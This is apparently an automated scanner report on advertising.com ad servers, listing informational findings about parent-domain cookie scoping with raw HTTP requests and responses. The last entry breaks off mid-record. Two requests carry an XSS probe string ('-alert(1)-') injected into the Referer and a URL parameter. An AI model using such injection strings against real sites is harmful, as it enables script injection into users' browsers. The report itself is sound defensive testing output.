Path:	/site=775632/size=300250/u=2/bnum=75921501/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

F1=BYTFW2EBAAAABAAAAgAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:11:02 GMT; path=/
BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPUN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnBo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HWYQhVoqqdkNzXwm0jnLhLqlPBs1jT005aL4js+Lazar6O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:11:02 GMT; path=/
ROLL=AfAiW6Nga0dM2aDL/oJpfu+3b1ZWiJlFnus7ma5xiT4NQCbmI40fCqFXLKqhd9u7nEy5v8B!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:11:02 GMT; path=/
75921501=_4d961536,0137232116,775632^960768^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=775632/size=300250/u=2/bnum=75921501/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://manhattan.ny1.com/content/top_stories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=er080012979743200010; aceRTB=rm%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Cam%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Cdc%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Can%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Crub%3DMon%2C%2018%20Apr%202011%2013%3A48%3A43%20GMT%7C; GUID=MTMwMTQyNTY1NDsxOjE2bHNxaWkxbjFhM2NyOjM2NQ; C2=TUhlNZK9CYVVGxgAaVlRMIpwHg02FT1BdbdxUdgohXMVHgZ4FT1BkFexUdgihXMVHgimGT1BZGexUdw7NYMVHMa4FT1BAGexUdAmoZMVH8fFGT1BmMqxUdA3WaMVH0NYGT1BSGexUdwnhXMVHERoGT1BC9qxUdAadaMVHQYrGTlrrUgj/ZsowmrBMKphCgpDBwU+FYXAHZfh3DbJBcYjGFipIIQ6/YIVwuLATKphS3adHoXdGsprMFwPAaYewKPAqNphv3qfe0xqGL/sdXgWqagrs64AK+mBn7a+DM5iGLPpuUgG2Y0Aj5QiGtzsmZwoka4Lm+XB9LlxVJ74FYooGuqsjVADga4qCKSB9mUBuGZAGAazFdiZmjoBoGKvGcuKG+Sj0jw+NXAcee6BFchxFB; F1=B8SFW2EBAAAABAAAAcAAgEA; BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPUN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnZo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HWYQhVoqqdkNzXwm0jnLhLqlPBs1jT005aL4js+Lazar6O!; ROLL=AfAiZ6Nga0dM2aDL/oJpfu+3b1ZWiJlFnus7ma5xiT4NQCbmI40fCqFXLKqhd9O!

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 01 Apr 2011 18:11:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.960768.775632.0XMC
Set-Cookie: F1=BYTFW2EBAAAABAAAAgAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:11:02 GMT; path=/
Set-Cookie: BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPUN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnBo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HWYQhVoqqdkNzXwm0jnLhLqlPBs1jT005aL4js+Lazar6O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:11:02 GMT; path=/
Set-Cookie: ROLL=AfAiW6Nga0dM2aDL/oJpfu+3b1ZWiJlFnus7ma5xiT4NQCbmI40fCqFXLKqhd9u7nEy5v8B!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:11:02 GMT; path=/
Set-Cookie: 75921501=_4d961536,0137232116,775632^960768^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Fri, 01 Apr 2011 18:11:02 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 598

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3671.AOL/B5159652.30;sz=300x250;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0000775632/mnum=0
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=775633/size=728090/u=2/bnum=34648487/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=TUhlNZK9CYVVGxgAaVlRMIpwHg02FT1BdbdxUdgohXMVHgZ4FT1BkFexUdgihXMVHgimGT1BZGexUdw7NYMVHMa4FT1BAGexUdAmoZMVH8fFGT1BmMqxUdA3WaMVH0NYGT1BSGexUdwnhXMVHERoGT1BC9qxUdAadaMVHQYrGTlrrUgj/ZsowmrBMKphCgpDBwU+FYXAHZfh3DbJBcYjGFipIIQ6/YIVwuLATKphS3adHoXdGsprMFwPAaYewKPAqNphv3qfe0xqGL/sdXgWqagrs64AK+mBn7a+DM5iGLPpuUgG2Y0Aj5QiGtzsmZwoka4Lm+XB9LlxVJ74FYooGuqsjVADga4qCKSB9mUBuGZAGAazFdiZmjoBoGKvGcuKG+Sj0jw+NXAcee6BFchxFB; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:27 GMT; path=/
F1=BMRFW2EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:27 GMT; path=/
BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPcN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnZo7V+CxYPm/bXFfJmtNJeSKvs26+zh4vwLJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HOYQhVoqqFkNzXwm0jnLhLqlPZs1jT005aL4js+Lazar6O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:27 GMT; path=/
ROLL=AfAif6Nga0dM2aD!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:27 GMT; path=/
34648487=_4d961513,5357117238,775633^894875^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=775633/size=728090/u=2/bnum=34648487/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=er080012979743200010; aceRTB=rm%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Cam%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Cdc%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Can%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Crub%3DMon%2C%2018%20Apr%202011%2013%3A48%3A43%20GMT%7C; F1=B8g5Q2kAAAAALInCAQAAgEgAAAAAqUyCAIAAeEgAAAAATi1CAEAA5CgAAAAAUi1CAEAABDgAAAAAVi1CAEAA5CgAAAAA86ADAEAAeEgAAAAAe/ADAEAA5CABAAAABAAAAIBA5CA; BASE=gKQkrmhpjJjpy24mVRcoq4SdsN4DbAQwMFaeqnfwaxhNqD6gryqB6EvxQXY2KV5lL8PiUafUl/jd3CaTb8zQcHMAUV3HWkGbQWfZDNNgjsbfnuO9nV0Nlc61bCpIG8T/su4h8sC0carEnP1KoTJVPzXGhktlOjx42bzuO8yI3jmN9RQwSzfIwqUqLkwHV94DQtJod/9cIfMmhhUJYd3tXzd8Z082dFw7MdgLZn1KZfSHVvoue6zRhz10Luq2igh0Xj4KRJJY7HWYMCVqqqVkTQXGSVin9nL2AHZsDlTIVFaLPlsGJmzaI8elJXyngY3igxMtwo/J9J+BxTqtZLUQWirDjQEyH1/Q+4xdi0E!; ROLL=AfAiU6NiUjcMvxCFS/IpTF/bjSYWBkkrfJt7F34ba05N9vawwf1fsHE7cJqhzQvN9wy5BRQEjQR5nSuxViq1EUM!; C2=23ikNZK9CYVVGFuAaVlRhLpwIg02FnCCdbdxpggohXcKIgZ4FnCCkFexpggihXcKIgimGnCCZGexpgw7NYcKIMa4FnCCAGexpgAmoZcKI8fFGnCCmMqxpgA3WacKI0NYGnCCSGexpgwnhXcKIERoGnCCC9qxpgAadacKIQYrGnirrYgj/Z8dwmrBMKphXjpDAEzIGLgAMlfBLJwR2XIzy2JAFFqx9AbJBcYjGZvpIMQ6/YYKwubATKphn2adIoXdGAnrMJwPAaoTwKfAqNphE3qff0xqGf8sdbgWqawgs6IBK+mB86a+EM5iGfMpuUgG2YE2k5QiGBxsmdwokaIBm+nB9LlxqI74GYooGCosjZADgaIgCKiB9mUBDGZAGAazFxvZmjoxhFKvHcuKGSQj0jw+NXgKeeKCFchxaA; GUID=MTMwMTQyNTY1NDsxOjE2bHNxaWkxbjFhM2NyOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 01 Apr 2011 18:10:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.894875.775633.0XMC
Set-Cookie: C2=TUhlNZK9CYVVGxgAaVlRMIpwHg02FT1BdbdxUdgohXMVHgZ4FT1BkFexUdgihXMVHgimGT1BZGexUdw7NYMVHMa4FT1BAGexUdAmoZMVH8fFGT1BmMqxUdA3WaMVH0NYGT1BSGexUdwnhXMVHERoGT1BC9qxUdAadaMVHQYrGTlrrUgj/ZsowmrBMKphCgpDBwU+FYXAHZfh3DbJBcYjGFipIIQ6/YIVwuLATKphS3adHoXdGsprMFwPAaYewKPAqNphv3qfe0xqGL/sdXgWqagrs64AK+mBn7a+DM5iGLPpuUgG2Y0Aj5QiGtzsmZwoka4Lm+XB9LlxVJ74FYooGuqsjVADga4qCKSB9mUBuGZAGAazFdiZmjoBoGKvGcuKG+Sj0jw+NXAcee6BFchxFB; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:27 GMT; path=/
Set-Cookie: F1=BMRFW2EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:27 GMT; path=/
Set-Cookie: BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPcN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnZo7V+CxYPm/bXFfJmtNJeSKvs26+zh4vwLJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HOYQhVoqqFkNzXwm0jnLhLqlPZs1jT005aL4js+Lazar6O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:27 GMT; path=/
Set-Cookie: ROLL=AfAif6Nga0dM2aD!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:27 GMT; path=/
Set-Cookie: 34648487=_4d961513,5357117238,775633^894875^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Fri, 01 Apr 2011 18:10:27 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 657

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253735207/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000775633/mnum=0000894
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=775633/size=728090/u=2/bnum=81095569/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

F1=B0SFW2EBAAAABAAAAYAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:53 GMT; path=/
BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPcN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnZo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HWYQhVoqqdkNzXwm0jnLhLqlPBs1jT005aL4js+Lazar6O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:53 GMT; path=/
ROLL=AfAiY6Nga0dM2aDL/oJpfu+3b1ZWiJlFnus7ma5xiT4NQCbmI40fCqF!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:53 GMT; path=/
81095569=_4d96152d,0804225804,775633^956561^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=775633/size=728090/u=2/bnum=81095569/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://manhattan.ny1.com/content/top_stories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=er080012979743200010; aceRTB=rm%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Cam%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Cdc%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Can%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Crub%3DMon%2C%2018%20Apr%202011%2013%3A48%3A43%20GMT%7C; GUID=MTMwMTQyNTY1NDsxOjE2bHNxaWkxbjFhM2NyOjM2NQ; C2=TUhlNZK9CYVVGxgAaVlRMIpwHg02FT1BdbdxUdgohXMVHgZ4FT1BkFexUdgihXMVHgimGT1BZGexUdw7NYMVHMa4FT1BAGexUdAmoZMVH8fFGT1BmMqxUdA3WaMVH0NYGT1BSGexUdwnhXMVHERoGT1BC9qxUdAadaMVHQYrGTlrrUgj/ZsowmrBMKphCgpDBwU+FYXAHZfh3DbJBcYjGFipIIQ6/YIVwuLATKphS3adHoXdGsprMFwPAaYewKPAqNphv3qfe0xqGL/sdXgWqagrs64AK+mBn7a+DM5iGLPpuUgG2Y0Aj5QiGtzsmZwoka4Lm+XB9LlxVJ74FYooGuqsjVADga4qCKSB9mUBuGZAGAazFdiZmjoBoGKvGcuKG+Sj0jw+NXAcee6BFchxFB; F1=BwRFW2EBAAAABAAAAUAAgEA; BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPcN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnZo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HWYQhVoqqdkNzXwm0jnLhLqlPZs1jT005aL4js+Lazar6O!; ROLL=AfAib6Nga0dM2aDL/oJpfu+3b1ZWiJlFnus7ma5xiT4NQCL!

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 01 Apr 2011 18:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.956561.775633.0XMC
Set-Cookie: F1=B0SFW2EBAAAABAAAAYAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:53 GMT; path=/
Set-Cookie: BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPcN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnZo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HWYQhVoqqdkNzXwm0jnLhLqlPBs1jT005aL4js+Lazar6O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:53 GMT; path=/
Set-Cookie: ROLL=AfAiY6Nga0dM2aDL/oJpfu+3b1ZWiJlFnus7ma5xiT4NQCbmI40fCqF!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:53 GMT; path=/
Set-Cookie: 81095569=_4d96152d,0804225804,775633^956561^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Fri, 01 Apr 2011 18:10:53 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 657

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390407/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000775633/mnum=0000956
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=775634/size=160600/u=2/bnum=50393661/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

F1=BkTFW2EBAAAABAAAAkAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:11:05 GMT; path=/
BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPUN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnBo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RurRxO1yE5r2rDh660pKMqJe7HWYQhVoqqdkNzXwm0jnLhLqlPBs1jT005aL4js+Lazar6O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:11:05 GMT; path=/
ROLL=AfAiX6Nga0dM2aDL/oJpfu+3b1ZWiJlFnus7ma5xiT4NQCbmI40fCqFXLKqhd9u7nEy5v8RyRUR5J/P!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:11:05 GMT; path=/
50393661=_4d961539,7387041562,775634^973887^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=775634/size=160600/u=2/bnum=50393661/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://manhattan.ny1.com/content/top_stories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=er080012979743200010; aceRTB=rm%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Cam%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Cdc%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Can%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Crub%3DMon%2C%2018%20Apr%202011%2013%3A48%3A43%20GMT%7C; GUID=MTMwMTQyNTY1NDsxOjE2bHNxaWkxbjFhM2NyOjM2NQ; C2=TUhlNZK9CYVVGxgAaVlRMIpwHg02FT1BdbdxUdgohXMVHgZ4FT1BkFexUdgihXMVHgimGT1BZGexUdw7NYMVHMa4FT1BAGexUdAmoZMVH8fFGT1BmMqxUdA3WaMVH0NYGT1BSGexUdwnhXMVHERoGT1BC9qxUdAadaMVHQYrGTlrrUgj/ZsowmrBMKphCgpDBwU+FYXAHZfh3DbJBcYjGFipIIQ6/YIVwuLATKphS3adHoXdGsprMFwPAaYewKPAqNphv3qfe0xqGL/sdXgWqagrs64AK+mBn7a+DM5iGLPpuUgG2Y0Aj5QiGtzsmZwoka4Lm+XB9LlxVJ74FYooGuqsjVADga4qCKSB9mUBuGZAGAazFdiZmjoBoGKvGcuKG+Sj0jw+NXAcee6BFchxFB; F1=BYTFW2EBAAAABAAAAgAAgEA; BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPUN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnBo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HWYQhVoqqdkNzXwm0jnLhLqlPBs1jT005aL4js+Lazar6O!; ROLL=AfAiW6Nga0dM2aDL/oJpfu+3b1ZWiJlFnus7ma5xiT4NQCbmI40fCqFXLKqhd9u7nEy5v8B!

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 01 Apr 2011 18:11:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.973887.775634.0XMC
Set-Cookie: F1=BkTFW2EBAAAABAAAAkAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:11:05 GMT; path=/
Set-Cookie: BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPUN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnBo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RurRxO1yE5r2rDh660pKMqJe7HWYQhVoqqdkNzXwm0jnLhLqlPBs1jT005aL4js+Lazar6O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:11:05 GMT; path=/
Set-Cookie: ROLL=AfAiX6Nga0dM2aDL/oJpfu+3b1ZWiJlFnus7ma5xiT4NQCbmI40fCqFXLKqhd9u7nEy5v8RyRUR5J/P!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:11:05 GMT; path=/
Set-Cookie: 50393661=_4d961539,7387041562,775634^973887^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Fri, 01 Apr 2011 18:11:05 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 597

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3671.AOL/B5229711.3;sz=160x600;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0000775634/mnum=00
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=775634/size=160600/u=2/bnum=54361916/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

F1=BsRFW2EBAAAABAAAAQAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:35 GMT; path=/
BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPcN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnZo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HWYQhVoqqFkNzXwm0jnLhLqlPZs1jT005aL4js+Lazar6O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:35 GMT; path=/
ROLL=AfAia6Nga0dM2aDL/oJpfu+3b1ZWiJlFnus7maJ!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:35 GMT; path=/
54361916=_4d96151b,5335516523,775634^894872^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

